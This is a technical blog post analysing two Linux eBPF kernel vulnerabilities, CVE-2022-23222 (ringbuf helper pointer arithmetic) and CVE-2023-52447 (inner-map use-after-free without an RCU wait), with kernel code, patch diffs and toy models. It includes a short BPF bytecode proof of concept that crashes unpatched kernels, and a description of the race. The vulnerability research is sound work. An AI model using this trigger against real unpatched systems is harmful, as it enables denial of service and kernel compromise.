Linux eBPF Design and Vulnerability Case Study - Part 2

This post continues the analysis of eBPF-related vulnerabilities.

Vulnerability Case Study 2 - bpf: Fix out of bounds access for ringbuf helpers (CVE-2022-23222)

1. Introduction

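Although this vulnerability was fixed in January 2022, the Linux version used by kernelCTF COS never received the backport, which is why it was still exploitable in 2024. The kernel config of the exploited cos-105-17412.294.62 shows that the kernel version is 5.15.146, so our analysis is based on that version's implementation.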

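In Linux 5.15.146, check_func_arg() still uses an older implementation that differs in several places from the code the commit touches. We therefore first look at the version the commit patches to understand the root cause, and then return to the problem in the 5.15.146 implementation.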

2. Root Cause Analysis

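When a BPF program calls a helper, the verifier has to check that the argument types match the current register contents. check_helper_call() decides whether the helper call is legal: it first fetches the function proto for the given ID [1], which describes the expected register types, and then checks each argument in turn [2].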

static int check_helper_call(struct bpf_verifier_env *env, struct bpf_insn *insn,
                 int *insn_idx_p)
{
    // [...]
    if (env->ops->get_func_proto)
        fn = env->ops->get_func_proto(func_id, env->prog); // [1]
  
    // [...]
    for (i = 0; i < MAX_BPF_FUNC_REG_ARGS; i++) {
        err = check_func_arg(env, i, &meta, fn); // [2]
        if (err)
            return err;
    }
    // [...]
}

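check_func_arg() verifies that an argument passed to a helper has the right type. Besides checking that the register's value type matches what the function expects [3], it also checks whether the access through a pointer-typed register is legal [4].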

static int check_func_arg(struct bpf_verifier_env *env, u32 arg,
              struct bpf_call_arg_meta *meta,
              const struct bpf_func_proto *fn)
{
    enum bpf_arg_type arg_type = fn->arg_type[arg];
    enum bpf_reg_type type = reg->type;
    // [...]
    err = check_reg_type(env, regno, arg_type, fn->arg_btf_id[arg]); // [3]
    switch ((u32)type) {
    // [...]
    case PTR_TO_STACK:
        break;
    default:
        err = __check_ptr_off_reg(env, reg, regno, // [4]
                      type == PTR_TO_BTF_ID);
    // [...]
    }
}

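__check_ptr_off_reg() first checks whether the register carries a fixed offset of its own (reg->off) [5]. For example, if the register value is the base address of a structure, reg->off may hold the offset of a field inside that structure. The function also checks whether the register has a non-constant variable offset (reg->var_off) [6], which describes the value range of the register.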

static int __check_ptr_off_reg(struct bpf_verifier_env *env,
                   const struct bpf_reg_state *reg, int regno,
                   bool fixed_off_ok)
{
    if (!fixed_off_ok && reg->off) { // [5]
        // [...]
        return -EACCES;
    }

    if (!tnum_is_const(reg->var_off) || reg->var_off.value) { // [6]
        // [...]
        return -EACCES;
    }

    return 0;
}

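In other words, __check_ptr_off_reg() ensures that the helper only receives the pointer exactly as it was originally obtained, not a version that has been modified by bytecode or by other means.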
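The two checks can be reproduced in a small userspace model. This is only a sketch: toy_tnum, toy_reg and toy_check_ptr_off() are made-up stand-ins for the verifier's types, reduced to the fields used above, and the model assumes that a tnum is constant exactly when its mask is zero.

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Toy stand-ins for the verifier's types; only the fields used here. */
struct toy_tnum { uint64_t value; uint64_t mask; };
struct toy_reg  { int32_t off; struct toy_tnum var_off; };

/* A tnum is constant when no bit is unknown (mask == 0). */
bool toy_tnum_is_const(struct toy_tnum t)
{
    return t.mask == 0;
}

/* Mirrors the two checks performed by __check_ptr_off_reg(). */
int toy_check_ptr_off(const struct toy_reg *reg, bool fixed_off_ok)
{
    assert(reg != NULL);

    /* [5] a fixed offset is only tolerated when the caller allows it */
    if (!fixed_off_ok && reg->off)
        return -EACCES;

    /* [6] the variable offset must be the known constant zero */
    if (!toy_tnum_is_const(reg->var_off) || reg->var_off.value)
        return -EACCES;

    return 0;
}
```

A register that still holds the original pointer passes, while one that was moved by -4 or that has unknown bits in var_off is rejected with -EACCES.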

The patch shows that an argument whose expected type is ARG_PTR_TO_ALLOC_MEM previously received no special handling here, even though it needs to be checked with __check_ptr_off_reg().

     case PTR_TO_BUF:
     case PTR_TO_BUF | MEM_RDONLY:
     case PTR_TO_STACK:
+        /* Some of the argument types nevertheless require a
+         * zero register offset.
+         */
+        if (arg_type == ARG_PTR_TO_ALLOC_MEM)
+            goto force_off_check;
         break;
     /* All the rest must be rejected: */
     default:
+force_off_check:
         err = __check_ptr_off_reg(env, reg, regno,
                       type == PTR_TO_BTF_ID);

In practice only two helpers take an argument of type ARG_PTR_TO_ALLOC_MEM: bpf_ringbuf_submit() and bpf_ringbuf_discard().

const struct bpf_func_proto bpf_ringbuf_discard_proto = {
    .func        = bpf_ringbuf_discard,
    .arg1_type    = ARG_PTR_TO_ALLOC_MEM,
    // [...]
};

const struct bpf_func_proto bpf_ringbuf_submit_proto = {
    .func        = bpf_ringbuf_submit,
    .arg1_type    = ARG_PTR_TO_ALLOC_MEM,
    // [...]
};

This is because submit and discard both operate on the address returned by a reserve operation, and the return type of bpf_ringbuf_reserve() is RET_PTR_TO_ALLOC_MEM_OR_NULL.

const struct bpf_func_proto bpf_ringbuf_reserve_proto = {
    .func        = bpf_ringbuf_reserve,
    .ret_type    = RET_PTR_TO_ALLOC_MEM_OR_NULL,
    // [...]
};

After a NULL check, the verifier promotes a value of type RET_PTR_TO_ALLOC_MEM_OR_NULL to PTR_TO_MEM, which is also the register type compatible with ARG_PTR_TO_ALLOC_MEM.

static const struct bpf_reg_types alloc_mem_types = { .types = { PTR_TO_MEM } };

static const struct bpf_reg_types *compatible_reg_types[__BPF_ARG_TYPE_MAX] = {
    // [...]
    [ARG_PTR_TO_ALLOC_MEM]        = &alloc_mem_types,
    // [...]
};

PTR_TO_MEM, however, is allowed to take part in pointer arithmetic (addition or subtraction). As a result, the first argument received by bpf_ringbuf_discard() or bpf_ringbuf_submit() may already be a modified pointer, which can lead to an out-of-bounds access.
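To see why a shifted pointer matters, here is a toy userspace model. It assumes that submit and discard locate the record header at a fixed distance (8 bytes) in front of the sample pointer; the struct layout, the TOY_HDR_SZ constant and both function names are illustrative and not the kernel's definitions.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define TOY_HDR_SZ 8   /* assumed size of the header preceding a sample */

/* Simplified layout of the header that sits right before each sample. */
struct toy_ringbuf_hdr { uint32_t len; uint32_t pg_off; };

/* Like submit/discard, find the header by stepping back from the sample. */
struct toy_ringbuf_hdr toy_read_hdr(const uint8_t *sample)
{
    struct toy_ringbuf_hdr hdr;

    assert(sample != NULL);
    memcpy(&hdr, sample - TOY_HDR_SZ, sizeof(hdr));
    return hdr;
}

/* Build a tiny "ring buffer": filler bytes, one header, then the sample. */
const uint8_t *toy_make_record(uint8_t *buf, size_t buf_len)
{
    uint32_t filler = 0x41414141, len = 0x3000, pg_off = 2;

    assert(buf_len >= 32);
    memset(buf, 0, buf_len);
    memcpy(buf + 4, &filler, 4);    /* data in front of the real header */
    memcpy(buf + 8, &len, 4);       /* real header: len */
    memcpy(buf + 12, &pg_off, 4);   /* real header: pg_off */
    return buf + 16;                /* sample starts after the header */
}
```

Calling toy_read_hdr() with the untouched sample pointer returns the real header, whereas passing sample - 4 makes the filler bytes show up as len and the real len show up as pg_off. In the kernel, fields read this way drive further memory accesses, which is what turns the bad pointer into an out-of-bounds access.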

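Back in Linux 5.15.146, the switch on the register type in check_func_arg() is instead written as a series of if-else branches, but there is still no check for ARG_PTR_TO_ALLOC_MEM, so the vulnerability is present there as well.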

3. PoC

It is enough to do arithmetic [2] on the pointer returned by bpf_ringbuf_reserve() [1]. bpf_ringbuf_discard() [3] then reads the record header from the wrong address, which triggers a crash.

{
    BPF_LD_MAP_FD(BPF_REG_1, ringbuf),
    BPF_MOV64_IMM(BPF_REG_2, 0x3000),
    BPF_MOV64_IMM(BPF_REG_3, 0x0),
    BPF_RAW_INSN(
        BPF_JMP | BPF_CALL, 0, 0, 0,
        BPF_FUNC_ringbuf_reserve), // [1]
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),
    BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),


    BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, -4), // [2]


    BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),
    BPF_MOV64_IMM(BPF_REG_2, 0x1),
    BPF_RAW_INSN(
        BPF_JMP | BPF_CALL, 0, 0, 0,
        BPF_FUNC_ringbuf_discard), // [3]

    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),
}
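For readers who have not used these instruction macros, the following sketch shows what the pointer-arithmetic step [2] looks like as a raw struct bpf_insn. It assumes the UAPI header <linux/bpf.h> is available; toy_alu64_add_imm() is a hypothetical helper written for this post, not one of the macros used by the PoC.

```c
#include <assert.h>
#include <linux/bpf.h>

/* Hypothetical helper: build one 64-bit "dst += imm" ALU instruction,
 * which is what a BPF_ALU64_IMM(BPF_ADD, dst, imm) style macro
 * is expected to expand to.
 */
struct bpf_insn toy_alu64_add_imm(__u8 dst, __s32 imm)
{
    struct bpf_insn insn = {
        .code    = BPF_ALU64 | BPF_ADD | BPF_K, /* class | op | immediate */
        .dst_reg = dst,
        .src_reg = 0,
        .off     = 0,
        .imm     = imm,
    };

    assert(dst <= BPF_REG_10);
    return insn;
}
```

toy_alu64_add_imm(BPF_REG_6, -4) yields an 8-byte instruction with opcode 0x07, destination register 6 and immediate -4, which is the operation that moves the reserved pointer before it is handed to the helper.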

4. Others

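Looking at the BPF code in Linux 6.6.35, the implementation of check_func_arg() has changed yet again. For example, the argument of bpf_ringbuf_{submit,discard} used to be ARG_PTR_TO_ALLOC_MEM but is now ARG_PTR_TO_RINGBUF_MEM, so it is no longer handled together with the other memory types.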

Vulnerability Case Study 3 - bpf: Defer the free of inner map when necessary (CVE-2023-52447)

1. Introduction

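From the commit log we can guess that this is a race condition involving BPF maps, caused by freeing an object without waiting for RCU readers. The vulnerability was also used against kernelCTF, so an exploit and a write-up are available in the kernelCTF GitHub repo. Much of the sample code below is based on that exploit.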

2. Nested Maps (map-in-map)

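BPF provides maps so that the kernel and userspace can share a region of memory to pass data. There are many map types, such as ringbuf, hashtab and array. BPF also supports nested maps, in which each element of the outer map is itself a map object. The type enum of such a map is named BPF_MAP_TYPE_XXXX_OF_MAPS, and only two types are currently implemented.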

BPF_MAP_TYPE_HASH_OF_MAPS (hashtab) - elements are accessed as key-value pairs; every element is a map and corresponds to a hash key
BPF_MAP_TYPE_ARRAY_OF_MAPS (arraymap) - elements are accessed as in an array; every element is a map and is indexed by an integer

When creating the outer map of a map-in-map structure, the process also has to supply an inner map fd that serves as the template for later map elements. For example, creating an arraymap invokes the callback array_of_map_alloc(), which calls bpf_map_meta_alloc() to build the metadata bpf_map object [1].

static struct bpf_map *array_of_map_alloc(union bpf_attr *attr)
{
    struct bpf_map *map, *inner_map_meta;

    inner_map_meta = bpf_map_meta_alloc(attr->inner_map_fd); // [1]
    map = array_map_alloc(attr);
    map->inner_map_meta = inner_map_meta;

    return map;
}

The hashtab follows the same flow [2]. The only difference is that the outer map is a hashtab rather than an array, so a different map allocator is called.

static struct bpf_map *htab_of_map_alloc(union bpf_attr *attr)
{
    struct bpf_map *map, *inner_map_meta;

    inner_map_meta = bpf_map_meta_alloc(attr->inner_map_fd); // [2]
    map = htab_map_alloc(attr);
    map->inner_map_meta = inner_map_meta;

    return map;
}

A userspace process can create nested maps as shown below.

int inner = bpf_create_map(BPF_MAP_TYPE_ARRAY, 4, 4, 0x30, 0);
int outer_arraymap = bpf_create_map(BPF_MAP_TYPE_ARRAY_OF_MAPS, 4, 4, 0x30, inner);
int outer_hashtab = bpf_create_map(BPF_MAP_TYPE_HASH_OF_MAPS, 4, 4, 0x30, inner);
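The bpf_create_map() calls above are presumably a thin wrapper around the BPF_MAP_CREATE command, with the inner map fd as the last argument. A minimal sketch of such a wrapper, assuming the UAPI header <linux/bpf.h> and the raw bpf() syscall, could look like this. The toy_ names are hypothetical, and the argument order simply follows the snippet above.

```c
#include <assert.h>
#include <linux/bpf.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Fill the BPF_MAP_CREATE attributes. inner_fd only matters for the
 * *_OF_MAPS types and is passed as 0 for ordinary maps.
 */
void toy_fill_map_attr(union bpf_attr *attr, __u32 type, __u32 key_size,
                       __u32 value_size, __u32 max_entries, __u32 inner_fd)
{
    assert(attr != NULL);
    memset(attr, 0, sizeof(*attr));
    attr->map_type     = type;
    attr->key_size     = key_size;
    attr->value_size   = value_size;
    attr->max_entries  = max_entries;
    attr->inner_map_fd = inner_fd;
}

/* Hypothetical wrapper: returns a new map fd, or -1 with errno set. */
int toy_create_map(__u32 type, __u32 key_size, __u32 value_size,
                   __u32 max_entries, __u32 inner_fd)
{
    union bpf_attr attr;

    toy_fill_map_attr(&attr, type, key_size, value_size, max_entries,
                      inner_fd);
    return (int)syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}
```

Actually creating the maps requires the usual BPF privileges, so toy_create_map() may fail with EPERM on a locked-down system.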

3. Update Element

The bpf() command BPF_MAP_UPDATE_ELEM lets a process add an element to a map. In the kernel it is handled by map_update_elem(), which first gets the bpf_map object from the fd [1], copies the user-supplied key [2] and value [3], and finally updates the map with the key-value pair [4].

static int map_update_elem(union bpf_attr *attr, bpfptr_t uattr)
{
    struct bpf_map *map;
    // [...]
    f = fdget(ufd);
    map = __bpf_map_get(f); // [1]
    // [...]
    key = ___bpf_copy_key(ukey, map->key_size); // [2]
    // [...]
    value_size = bpf_map_value_size(map);
    value = kvmemdup_bpfptr(uvalue, value_size); // [3]
    // [...]
    err = bpf_map_update_value(map, f.file, key, value, attr->flags); // [4]
    // [...]
}

bpf_map_update_value() handles each map type differently. If the map is an arraymap [5], it calls bpf_fd_array_map_update_elem(); if it is a hashtab [6], it calls bpf_fd_htab_map_update_elem().

static int bpf_map_update_value(struct bpf_map *map, struct file *map_file,
                void *key, void *value, __u64 flags)
{
    // [...]
    } else if (IS_FD_ARRAY(map)) { // [5]
        rcu_read_lock();
        err = bpf_fd_array_map_update_elem(map, map_file, key, value,
                           flags);
        rcu_read_unlock();
    } else if (map->map_type == BPF_MAP_TYPE_HASH_OF_MAPS) { // [6]
        rcu_read_lock();
        err = bpf_fd_htab_map_update_elem(map, map_file, key, value,
                          flags);
        rcu_read_unlock();
    }
    // [...]
}

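bpf_fd_array_map_update_elem() expects the key to be an integer index [7] and the value to be a map fd, which it resolves to a map pointer [8]. If the slot already held an element, the old one is released after the update [9].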

int bpf_fd_array_map_update_elem(struct bpf_map *map, struct file *map_file,
                 void *key, void *value, u64 map_flags)
{
    struct bpf_array *array = container_of(map, struct bpf_array, map);
    void *new_ptr, *old_ptr;
    u32 index = *(u32 *)key, ufd; // [7]
    // [...]
    ufd = *(u32 *)value;
    new_ptr = map->ops->map_fd_get_ptr(map, map_file, ufd); // [8]
    // [...]

    } else {
        old_ptr = xchg(array->ptrs + index, new_ptr);
    }

    if (old_ptr)
        map->ops->map_fd_put_ptr(old_ptr); // [9]
    return 0;
}

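bpf_fd_htab_map_update_elem() updates the table by hash key [10]. As with the arraymap, an element that gets replaced is released, although here that happens inside htab_map_update_elem() rather than in this function. The map_fd_put_ptr() call visible below [11] only drops the reference to the new map when the update fails.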

int bpf_fd_htab_map_update_elem(struct bpf_map *map, struct file *map_file,
                void *key, void *value, u64 map_flags)
{
    void *ptr;
    int ret;
    u32 ufd = *(u32 *)value;

    ptr = map->ops->map_fd_get_ptr(map, map_file, ufd);
    ret = htab_map_update_elem(map, key, &ptr, map_flags); // [10]
    if (ret)
        map->ops->map_fd_put_ptr(ptr); // [11]

    return ret;
}

For both arraymap and hashtab, .map_fd_put_ptr is bpf_map_fd_put_ptr(), which releases the map object.

const struct bpf_map_ops array_of_maps_map_ops = {
    // [...]
    .map_free = array_of_map_free,
    .map_fd_put_ptr = bpf_map_fd_put_ptr,
    // [...]
};

const struct bpf_map_ops htab_of_maps_map_ops = {
    // [...]
    .map_free = htab_of_map_free,
    .map_fd_put_ptr = bpf_map_fd_put_ptr,
    // [...]
};

bpf_map_fd_put_ptr() is a wrapper around bpf_map_put(). bpf_map_put() first decrements refcnt and, once it reaches 0, enqueues a work item [12] that runs bpf_map_free_deferred() to free the inner bpf_map object.

void bpf_map_put(struct bpf_map *map)
{
    if (atomic64_dec_and_test(&map->refcnt)) {
        bpf_map_free_id(map);
        btf_put(map->btf);
        INIT_WORK(&map->work, bpf_map_free_deferred); // [12]
        queue_work(system_unbound_wq, &map->work);
    }
}
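The "last put only queues the free" pattern can be modelled in userspace as follows. This is a simplified sketch: toy_map, toy_workqueue and toy_run_worker() are invented for illustration, and a plain linked list stands in for the kernel workqueue.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>

struct toy_map {
    atomic_long refcnt;
    bool freed;
    struct toy_map *next_work;   /* link in the pending work list */
};

/* Stand-in for system_unbound_wq: a list of maps waiting to be freed. */
static struct toy_map *toy_workqueue;

/* Drop one reference; the final put only queues the free. */
void toy_map_put(struct toy_map *map)
{
    assert(map != NULL);
    /* atomic_fetch_sub() returns the old value, so 1 means "now zero" */
    if (atomic_fetch_sub(&map->refcnt, 1) == 1) {
        map->next_work = toy_workqueue;
        toy_workqueue = map;
    }
}

/* Stand-in for the kworker that later runs bpf_map_free_deferred(). */
void toy_run_worker(void)
{
    while (toy_workqueue) {
        struct toy_map *map = toy_workqueue;

        toy_workqueue = map->next_work;
        map->freed = true;   /* the kernel calls map->ops->map_free() */
    }
}
```

The point to notice is that nothing between the final put and the worker run waits for anyone who might still be using the map. The free is merely moved to another context.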

bpf_map_free_deferred() calls the .map_free callback from the operation table to free the map.

static void bpf_map_free_deferred(struct work_struct *work)
{
    struct bpf_map *map = container_of(work, struct bpf_map, work);
    // [...]
    map->ops->map_free(map);
    // [...]
}

4. Run BPF Program

When a packet is received or sent, sk_filter() is called to run the filter hook. It is a wrapper around sk_filter_trim_cap().

static inline int sk_filter(struct sock *sk, struct sk_buff *skb)
{
    return sk_filter_trim_cap(sk, skb, 1);
}

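sk_filter_trim_cap() calls bpf_prog_run_save_cb() [1] to run the filter hook. A socket can install a BPF program as its filter hook with setsockopt(SO_ATTACH_BPF). Before the hook runs, the function takes the RCU read lock [2], so that RCU-protected objects are not freed while the program is executing.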

int sk_filter_trim_cap(struct sock *sk, struct sk_buff *skb, unsigned int cap)
{
    // [...]
    rcu_read_lock(); // [2]
    filter = rcu_dereference(sk->sk_filter);
    if (filter) {
        // [...]
        pkt_len = bpf_prog_run_save_cb(filter->prog, skb); // [1]
        // [...]
    }
    rcu_read_unlock();
}

Further down the call chain this reaches __bpf_prog_run(), which calls bpf_dispatcher_nop_func() to indirectly execute the JIT-compiled BPF code [3].

static __always_inline u32 __bpf_prog_run(const struct bpf_prog *prog,
                      const void *ctx,
                      bpf_dispatcher_fn dfunc)
{
    // [...]
    } else {
        ret = dfunc(ctx, prog->insnsi, prog->bpf_func); // [3]
    }
    return ret;
}

5. Root Cause Analysis

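During the analysis we found that, besides the patch listed on the kernelCTF sheet, some earlier patches are related to this vulnerability as well. Commit 79d93b3, for example, changes the function called when an element is deleted: in addition to the original parameters, the patched function takes need_defer, which decides whether freeing the map object has to be deferred.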

diff --git a/kernel/bpf/arraymap.c b/kernel/bpf/arraymap.c
index f9aed5909d6e0b..4a4a67956e2119 100644
--- a/kernel/bpf/arraymap.c
+++ b/kernel/bpf/arraymap.c
@@ -871,7 +871,7 @@ int bpf_fd_array_map_update_elem(struct bpf_map *map, struct file *map_file,
     return 0;
 }
 
-static long fd_array_map_delete_elem(struct bpf_map *map, void *key)
+static long __fd_array_map_delete_elem(struct bpf_map *map, void *key, bool need_defer)
 {
     struct bpf_array *array = container_of(map, struct bpf_array, map);
     void *old_ptr;
@@ -890,13 +890,18 @@ static long fd_array_map_delete_elem(struct bpf_map *map, void *key)
     }
 
     if (old_ptr) {
-        map->ops->map_fd_put_ptr(map, old_ptr, true);
+        map->ops->map_fd_put_ptr(map, old_ptr, need_defer);
         return 0;
     } else {
         return -ENOENT;
     }
 }

Back to the original commit: when bpf_map_fd_put_ptr() is called with need_defer == true, it sets free_after_mult_rcu_gp of the bpf_map object to true.

diff --git a/kernel/bpf/map_in_map.c b/kernel/bpf/map_in_map.c
index 2dfeb5835e1656..3248ff5d816172 100644
--- a/kernel/bpf/map_in_map.c
+++ b/kernel/bpf/map_in_map.c
@@ -129,10 +129,15 @@ void *bpf_map_fd_get_ptr(struct bpf_map *map,
 
 void bpf_map_fd_put_ptr(struct bpf_map *map, void *ptr, bool need_defer)
 {
-    /* ptr->ops->map_free() has to go through one
-     * rcu grace period by itself.
+    struct bpf_map *inner_map = ptr;
+
+    /* The inner map may still be used by both non-sleepable and sleepable
+     * bpf program, so free it after one RCU grace period and one tasks
+     * trace RCU grace period.
      */
-    bpf_map_put(ptr);
+    if (need_defer)
+        WRITE_ONCE(inner_map->free_after_mult_rcu_gp, true);
+    bpf_map_put(inner_map);
 }

In bpf_map_put(), if free_after_mult_rcu_gp of the bpf_map object is true, the free goes through RCU, which guarantees that the map being freed cannot be hit by a UAF.

-        INIT_WORK(&map->work, bpf_map_free_deferred);
-        /* Avoid spawning kworkers, since they all might contend
-         * for the same mutex like slab_mutex.
-         */
-        queue_work(system_unbound_wq, &map->work);
+
+        if (READ_ONCE(map->free_after_mult_rcu_gp))
+            call_rcu_tasks_trace(&map->rcu, bpf_map_free_mult_rcu_gp);
+        else
+            bpf_map_free_in_work(map);

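RCU is optimized for read-mostly workloads. Put simply, it splits an update into two phases: removal and reclamation. Removal clears the pointers through which the target object can be reached, or points them at a new object, so that later readers no longer get the old object. Reclamation waits for the readers that were already using the target object before the removal (the ongoing readers) and frees the object only after they have finished. See the Linux documentation for a more detailed introduction to RCU.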

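In other words, the original free path did not wait for RCU before freeing a map-in-map element, so the map object could be freed while a BPF program was still in the middle of using it, resulting in a UAF.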

## Thread 1 (free map-in-map)
__fd_array_map_delete_elem()
  bpf_map_fd_put_ptr()
    queue_work()
    bpf_map_free_deferred() (in callback)
      map->ops->map_free()     <---------------
                                              |
## Thread 2 (UAF bpf program)                 |
reg8 = BPF_FUNC_map_lookup_elem               |
heavy job                                     |
access reg8 (UAF!!!)   <-----------------------

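In "Run BPF Program" we mentioned that rcu_read_lock() is called before a BPF program runs, but the reclaimer freed the object directly without taking the RCU read-side lock into account. The patch therefore adds call_rcu_tasks_trace(), so that a map-in-map element is freed only after readers have left their RCU critical sections.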

__fd_array_map_delete_elem()
  bpf_map_fd_put_ptr()
    call_rcu_tasks_trace()
    bpf_map_free_mult_rcu_gp() (in rcu callback)
      queue_work()
      bpf_map_free_deferred() (in callback)
        map->ops->map_free()

The added call_rcu_tasks_trace() runs the callback only after every task has passed through a quiescent state, that is, has left its RCU critical section, which keeps RCU-protected objects safe.
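The difference between the two flows can be shown with a deliberately simplified, single-threaded model. All names here are invented for illustration. A reader counter stands in for RCU read-side critical sections, and unlike real RCU the model waits for every active reader rather than only those that started before the removal.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

struct toy_obj { bool freed; };

static int toy_readers;              /* readers inside a read-side section */
static struct toy_obj *toy_pending;  /* object waiting for readers to leave */

void toy_read_lock(void)
{
    toy_readers++;
}

/* When the last reader leaves, the deferred free is finally carried out. */
void toy_read_unlock(void)
{
    assert(toy_readers > 0);
    if (--toy_readers == 0 && toy_pending) {
        toy_pending->freed = true;
        toy_pending = NULL;
    }
}

/* Pre-patch behaviour: reclaim without looking at readers. */
void toy_free_now(struct toy_obj *obj)
{
    obj->freed = true;
}

/* Post-patch behaviour: reclaim only when no reader can still hold obj. */
void toy_free_deferred(struct toy_obj *obj)
{
    if (toy_readers == 0)
        obj->freed = true;
    else
        toy_pending = obj;
}
```

With a reader active, toy_free_now() marks the object freed immediately, which corresponds to the UAF window in the first diagram. toy_free_deferred() leaves it alive until toy_read_unlock() runs, which corresponds to the patched flow.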